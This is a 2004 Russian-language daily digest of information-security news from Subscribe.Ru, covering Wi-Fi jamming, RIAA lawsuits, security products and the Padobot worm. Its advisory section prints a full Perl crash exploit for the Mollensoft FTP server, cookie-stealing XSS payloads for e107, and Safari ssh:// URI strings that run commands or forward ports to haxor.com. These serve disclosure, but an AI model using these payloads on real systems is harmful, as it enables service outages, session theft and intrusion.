Рассылка закрыта
При закрытии подписчики были переданы в рассылку "Информационная безопасность: новости, статьи, обзоры" на которую и рекомендуем вам подписаться.
Вы можете найти рассылки сходной тематики в Каталоге рассылок.
15 новостей по информационной безопасности каждый день
Информационный Канал Subscribe.Ru |
Содержание
- Проблемные ситуации, информационная преступность, сетевые войны
- Технологии безопасности. Организации разработчики, интеграторы.
- Информационая безопасность бизнеса
- Информационая безопасность общественной коммуникации, личности.
- Дыры и патчи программ и операционных сред
Проблемные ситуации, информационная преступность, сетевые войны |
PDA терроризирует беспроводные сети
26 мая | ROL
Согласно информации австралийских компьютерных специалистов из Australian Computer Emergency Response (AusCERT), для беспроводных сетей могут быть созданы помехи с помощью такого простого оборудования, как карманный компьютер с обычной картой беспроводной связи.
Wi-Fi сети приобретают все большую популярность в работе, но общеизвестно, что они уязвимы для помех. Предполагалось, что для создания помех потребуется дорогостоящее оборудование, однако, студенты из Queensland University of Technology опровергли это.
Они продемонстрировали, что карманный компьютер с сетевой картой беспроводной связи может излучать требуемую полосу частот с расстояния примерно 30 метров, чтобы создать помехи. Wi-Fi устройства воспринимают сигнал помехи и перестают транслировать, пока этот сигнал не закончится.
AusCERT сообщает, что компьютерные атаки тяжело будет предотвратить, поскольку проблема находится в самом Wi-Fi протоколе. Тем не менее, такие атаки могут только заблокировать доступ в сеть, но не обеспечат хакерам доступ к информации.
Эпопея URI-уязвимостей в MacOS продолжается
26 мая | uinC Новости:В дополнение к предыдущим URI-уязвимостям в MacOS появилась
ещё одна. На сей раз на сайте insecure.ws опубликовано сообщение о существовании
уязвиимости в обработке URI в браузере Safari. При задании в поле URI ссылки на
ssh могут выполняться произвольные команды (с выставленной опцией ProxyCommand).
Также можно использовать в формируемом URI опцию проброса портов -R, для чего
необходимо софрмировать следующую ссылку - ssh://ssh haxor.com -R
port:localhost:port. Как пишет сам автор, вполне возможно, что уязвимость
существует и в других браузерах - Camino,Firefox,Mozilla, однако ему её не
удалось воспроизвести на них (возможно, из-за багов в обработке переключателей
на использующемся Gnome 2.6.1. Также возможно существование уязвимости в других
ОС, однако подтвердить это не удалось. Проверена только защита браузера
konqueror (не сработало). На странице с описанием приводится ссылка на
демо-страницу с эксплоитом. Кроме того, существует частный патч для латания
уязвимости, ссылка на который приведена ниже.
Описание
Патч
RIAA тянет в суд еще полтысячи «p2p-пиратов»
26 мая | SecurityLab.ru
Ассоциация звукозаписывающих компаний Америки (RIAA) призвала
к ответу еще 493 предполагаемых пользователей пиринговых сетей, обвиняемых в
незаконном распространении аудиозаписей, защищенных законодательством об
авторских правах.
Таким образом, как пишет Wired, общее количество жертв борьбы за победу мирового копирайта может достичь трех тысяч человек. На сегодняшний день адвокатам, представляющим интересы входящих в RIAA звукозаписывающих корпораций, удалось свести к «полюбовному разрешению» 400 судебных исков, получив с каждого из ответчиков в среднем по три тысячи долларов. Столь низкий процент внесудебных разрешений объясняется тем, что иски, как правило, подаются не против конкретных граждан Соединенных Штатов, а против абстрактных обвиняемых, о которых известно лишь то, что в пиринговых сетях они пользуются определенными IP-адресами. Для того же, чтобы выяснить имя конкретного пользователя, истцу приходится долго договариваться с интернет-провайдером ответчика, чтобы тот выдал ему ФИО и адрес пользователя пиринговой сети, что происходит очень редко. Сейчас из 493 ответчиков адвокатам RIAA известны имена лишь 24 жертв научно-технического прогресса. Надо полагать, с ними тоже попытаются «договориться» полюбовно. |
Технологии безопасности. Организации разработчики, интеграторы. |
Network Associates выпустил антивирус для Linux-серверов
26 мая | SecurityLab.ru
Компания Network Associates объявила о выпуске антивируса
McAfee LinuxShield для серверов под управлением ОС Linux. Программа ищет и
уничтожает вирусы и червей, в том числе, в упакованных файлах, имеет
эвристический анализатор для определения подозрительного кода, а также систему
автоматического обновления.
В отличие от Windows-систем, платформа Linux не так популярна среди авторов вирусов и троянских программ, но зачастую Linux-машины служат перевалочным пунктом для распространения вирусов под ОС от Microsoft. Для предотвращения этого, новый антивирус Network Associates для Linux способен обнаруживать не только небольшое количество специфических Linux-"изделий", но и все известные вирусы под Windows, а также файлы, подозреваемые на наличие таких вирусов. LinuxShield интегрируется в другие продукты Network Associate для этой ОС и управляется с консоли политик безопасности McAfee ePolicy Orchestrator. Антивирус работает на серверах с Red Hat 9.0, Red Hat Enterprise 2.1, 3.0, Advanced Server/Workstation/Enterprise Server, SuSE 8.2 и 9.0, и SuSE Enterprise 8.0 Server. |
Информационая безопасность бизнеса |
Microsoft решила завоевать рынок корпоративных средств сетевой безопасности
26 мая | SecurityLab.ruКомпания Microsoft в понедельник объявила о своих планах по выходу на рынок корпоративных программных средств сетевой безопасности.
Как сообщает Reuters, на конец этого года запланирован выход нового продукта от Microsoft - Internet Security and Acceleration (ISA) Server 2004. Эта программа является переработкой инструмента ISA 2000, предназначенного для обеспечения безопасности корпоративных сетей, контроля за параметрами безопасности и для оптимизации работы сетевых приложений.
Для продвижения продукта на новом рынке Microsoft намеревается продавать его вместе с сетевым оборудованием своих партнеров - в частности, Hewlett-Packard и Network Engines.
Таким образом, отмечают аналитики, Microsoft пытается завоевать новый для себя рынок, на котором традиционно доминируют компании CheckPoint Software и SonicWall. Цена копии ISA Server 2004 для одного сервера, как ожидается, составит 1499 долларов.
Информационая безопасность общественной коммуникации, личности. |
"Информзащита" научит, как защитить беспроводные Wi-Fi сети
26 мая | ROL
Некоторое время назад специалисты Учебного центра "Информзащита" вместе с соответствующей аппаратурой прошли 2 км вдоль одной из улиц Москвы и обнаружили 11 беспроводных корпоративных сетей стандарта Wi-Fi. Как оказалось, 4 из них были абсолютно не защищены и открыты для взлома.
В большинстве случаев защита сетей Wi-Fi ограничивается использованием протокола Wired Equivalent Privacy (WEP), что в современных условиях совершенно недостаточно. При таком уровне защиты технически подкованный злоумышленник, имеющий ноутбук, сможет без труда удастся составить "хакерскую карту" Wi-Fi сетей Москвы. И, скорее всего, такая карта уже существует и, возможно, ее уже даже можно купить по сходной цене.
Специалисты в области информационной безопасности сравнивают развертывание беспроводной сети "из коробки" с ситуацией, когда администратор устанавливает на улице подключенный к сети предприятия коммутатор. Следствием этого могут стать несанкционированные подключения к сети, прослушивание и модификация трафика, несанкционированное использование корпоративных ресурсов, обход межсетевых экранов, атаки типа "отказ в обслуживании" и т.п. Это - цена непрофессиональной установки и эксплуатации беспроводных сетей.
Посчитав эту проблему актуальной, специалисты Учебного центра "Информзащита" разработали двухдневный курс "Безопасность беспроводных сетей". Его слушатели узнают, можно ли использовать беспроводные сети без снижения уровня безопасности сети в целом, как построить защищенную сетевую инфраструктуру на основе технологии 802.11х, как правильно подключить точку доступа и получат ответы на многие другие вопросы.
Более подробную информацию о курсе "Безопасность беспроводных сетей" можно найти здесь. Первые занятия пройдут 10 - 11 июня 2004 года.
(по материалам УЦ "Информзащита")
"РТКомм.РУ" убережет своих клиентов от спама.
26 мая | ФЦП Электронная Россия
Российский оператор фиксированной связи "РТКомм.РУ" начал предоставлять услуги по защите от спама для пользователей своего дата-центра. Для этой цели компания стала применять программное обеспечение, позволяющее размечать сообщения электронной почты.
При этом оператор получил возможность, в зависимости от желания пользователей, как просто помечать сообщения как спам, так и автоматически их удалять, без доставки в почтовые ящики клиентов. Для оказания данного сервиса используется программное обеспечение "Спамтест" производства компании "Ашманов и партнеры".
Как сообщил репортеру ComNews.ru генеральный директор компании "Ашманов и Партнеры" Игорь Ашманов, для реализации проекта компании "РТКомм.РУ" лицензировала фильтр спама "Спамтест" у его компании. При этом "РТКомм.РУ" закупает технику – сервера, на которые устанавливается программное обеспечении и предоставляет своим клиентам услугу фильтрации спама. "Спамтест" распознаёт спам и помечает его специальными метками, а бизнес-логика (правила обработки спама) обычно настраивается самим клиентом.
По поводу стоимости сервиса Игорь Ашманов отметил, что фактически пользователь платит не за программное обеспечение, а за услугу – за доставку ежечасных обновлений базы данных фильтра спама. В среднем при объеме трафика 100 тыс. сообщений в сутки услуга фильтрации стоит порядка 2 тыс. долл. в год, фильтрация без лимита трафика на одном сервере – 20 тыс. долл. в год. Таким образом, компанией "РТКомм.РУ" услуга разметки сообщений электронной почты будет предоставляться на базе годовой подписки.
Директор по маркетингу "РТКомм.РУ" Наталья Ананьева отметила, что "РТКомм.РУ" сотрудничает с "Ашманов и партнеры" с 2003 г.
Еще одним крупным игроком на рынке хостинга является компания Widexs. Директор по маркетингу Widexs Людмила Старикова сообщила репортеру ComNews.ru, что в целом, идея "РТКомм.РУ" по предоставлению защиты от спама на базе собственного дата-центра интересна, так как обычно каждый клиент оператора занимается этим самостоятельно. "Однако сказать, что она универсальна, нельзя, ввиду индивидуальности каждого клиента. Для арендаторов виртуального хостинга такой способ защиты от спама будет интересен, но серьезные крупные компании обычно сами решают вопросы защиты от спама, в зависимости от сферы своей деятельности. Так как у нас есть своя собственная сеть доступа в Интернет, и наши клиенты сразу получают все средства защиты. Но отмечу, что ни одного одинакового клиента и одинаковых требований с их стороны у нас не было, поэтому что-либо тиражировать на этом рынке очень сложно", – сказала Людмила Старикова.
Досье ComNews.ru. Дата-центр ОАО "РТКомм.РУ" предоставляет услуги хостинга с возможностью установки или аренды сервера, организации веб- или почтового сервиса, получения поддержки информационных проектов. На хостинг-площадке содержатся такие ресурсы как "Авто.ру", "Агава", "Мастак", "Ранет.ру", "Лаборатория Касперского", "ДиалогНаука", НТВ, НТВ+, "Нет.ру", IXBT.com.
ДАТА-центр соединен с магистральной сетью "РТКомм-интернет" двумя независимыми каналами GigabitEthernet (по 1 Гбит/с каждый) и каналом STM-4.
Дыры и патчи программ и операционных сред |
Cетевой червь Padobot.
26 мая | uinC Новости:"Лаборатория Касперского" сообщает об обнаружении двух версий
нового сетевого червя Worm.Win32.Padobot. Червь распространяется, используя для
своего размножения уязвимость в службе LSASS Microsoft Windows. Ее описание
приведено в Microsoft Security Bulletin MS04-011. После заражения инфицированная
машина выводит сообщение об ошибке "LSASS service failing", после чего может
попытаться перезагрузиться. Червь открывает на зараженной машине порты TCP 113,
3067 и 2041 для приема команд. При запуске червь копирует себя в системный
каталог Windows с произвольным именем и регистрируется в ключе автозапуска
системного реестра:[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WinUpdate"="%system%\[имя файла]".
Также создает ключ:
[HKLM\SOFTWARE\Microsoft\Wireless] "Server"="1". Создает в памяти уникальные
идентификаторы "10", "u2", и "uterm5" для определения своего присутствия в
системе.
Лаборатория
Касперского
Подмена netlink сообщений в BusyBox
26 мая | SecurityLab.ru
Программа: BusyBox
Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость обнаружена в BusyBox. Локальный пользователь может подменить некоторые сообщения. SuSE предупреждает, что BusyBox не достаточно обрабатывает netlink сокеты. Локальный пользователь может подменить netlink сообщения к BusyBox процессу. URL производителя:http://www.busybox.net/ Решение:Узвимость устранена только в SuSE Linux. |
Локальное выполнение произвольного кода в сPanel Apache mod_phpsuexec
26 мая | SecurityLab.ru
Программа: cPanel
Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость обнаружена в cPanel когда используется с параметром Apache mod_phpsuexec. Локальный пользователь может выполнить произвольный код с привилегиями другого пользователя. Программе использует некорректные параметра при компиляции Apache 1.3.29 и PHP с параметром mod_phpsuexec (не по умолчанию!). PHP приложение может выполнять другие приложения, используя измененную переменную PATH_INFO. Локальный пользователь может выполнить произвольный PHP код (включая команды операционной системы) на целевой системе с привилегиями любого пользователя, который владеет PHP файлом. Пример/Эксплоит: http://64.240.171.106/cpanel.php URL производителя: http://www.cpanel.net/ Решение:Установите последнее обновление к программе. |
Межсайтовый скриптинг в e107
26 мая | SecurityLab.ru
Программа: e107
Опасность: Наличие эксплоита: Да Описание: Уязвимость обнаружена в e107. Удаленный авторизованный пользователь может выполнить XSS нападение. Сценарий 'usersettings.php' не фильтрует данные, представленные пользователем, перед тем, как 'user.php' отобразит информацию. Пример/Эксплоит: URL field: http://www.mysiteurl.com/<script>alert(document.cookie)</script> AIM/MSN field: <script>alert(document.cookie)</script> URL производителя:http://www.e107.org/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
Удаленный отказ в обслуживании против F5 BIG-IP
26 мая | SecurityLab.ru
Программа: F5 BIG-IP 4.5 - 4.5.10
Опасность: Средняя Наличие эксплоита: Нет Описание: Отказ в обслуживании обнаружен в F5 BIG-IP. Удаленный пользователь может аварийно завершить работу системы. Удаленный пользователь может послать SYN flood к целевому коммутатору, чтобы вызвать панику ядра. Уязвимость связанна с ошибкой состояния операции в обработке TCP SYN Куки. URL производителя:http://www.f5.com/f5products/bigip/ Решение:Установите HOTFIX-CR34199. |
Удаленное выполнение SSH с параметрами в Safari web browser
26 мая | SecurityLab.ru
Программа: Safari web browser
Опасность: Средняя Наличие эксплоита: Да Описание: Уязвимость обнаружена в Safari web browser на Mac OS X. Удаленный пользователь может вызвать SSH с параметрами на целевой системе. Удаленный пользователь может создать специально обработанный URL, чтобы заставить ssh использовать параметр ProxyCommand на ssh клиенте. Уязвимость может использоваться для выполнения произвольных команд на целевой системе. Пример (должен быть URL кодирован: "ssh://a -F :FVolumes:ssh:config" URL производителя: http://www.apple.com/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
Удаленное переполнение буфера в Mollensoft Lightweight FTP Server
26 мая | SecurityLab.ru
Программа: Mollensoft Lightweight FTP Server
3.6
Опасность: Средняя Наличие эксплоита: Да Описание: Переполнение буфера обнаружено в Mollensoft Lightweight FTP Server в обработке команды CWD. Удаленный авторизованный пользователь может аварийно завершить работу FTP сервера. Удаленный авторизованный пользователь может представить специально обработанную CWD команду от 224 до 1018 символов, чтобы вызвать переполнение буфера и аварийно завершить работу FTP сервера. Пример/Эксплоит: #!/usr/bin/perl # Mollensoft FTP Server CMD Buffer Overflow # Orkut users? Come join the SecuriTeam community # http://www.orkut.com/Community.aspx?cmm=44441 use strict; use IO::Socket::INET; usage() unless (@ARGV == 2); my $host = shift(@ARGV); my $port = shift(@ARGV); # create the socket my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port); $socket or die "Cannot connect to host!\n"; $socket->autoflush(1); # receive greeting my $repcode = "220 "; my $response = recv_reply($socket, $repcode); print $response; # send USER command #my $username = "%00" x 2041; my $username = "anonymous"; print "USER $username\r\n"; print $socket "USER $username\r\n"; select(undef, undef, undef, 0.002); # sleep of 2 milliseconds # send PASS command my $password = "a\@b.com"; print "PASS $password\r\n"; print $socket "PASS $password\r\n"; my $cmd = "CWD "; $cmd .= "A" x 224; # Value can range from 224 to 1018 $cmd .= "\r\n"; print "length: ".length($cmd)."\n"; print $socket $cmd; $repcode = ""; recv_reply($socket, $repcode); close($socket); exit(0); sub usage # print usage information print "\nUsage: Mollensoft_FTP_Server_crash.pl <host> <port>\n <host> - The host to connect to <port> - The TCP port which WarFTP is listening on\n\n"; exit(1); sub recv_reply # retrieve any reply my $socket = shift; my $repcode = shift; $socket or die "Can't receive on socket\n"; my $res=""; while(<$socket>) { $res .= $_; if (/$repcode/) { last; } } return $res; URL производителя: http://www.mollensoft.com/product2.htm Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
Обход URL фильтрации в NETGEAR RP114
26 мая | SecurityLab.ru
Программа: NETGEAR RP114
Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость обнаружена в механизме блокирование ключевых слов в NETGEAR RP114 маршрутизаторе. Удаленный пользователь может обойти URL фильтр. Маршрутизатор не в состоянии отфильтровать URL, когда запрашиваемый URL длиннее 220 байт. Уязвимость связанна с переполнением буфера. URL производителя: http://www.netgear.com/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
Инструменты управления содержанием Метод.ру
Дата создания документа: 18:54 26.05.04
http://subscribe.ru/
E-mail: ask@subscribe.ru |
Отписаться
Убрать рекламу |
В избранное | ||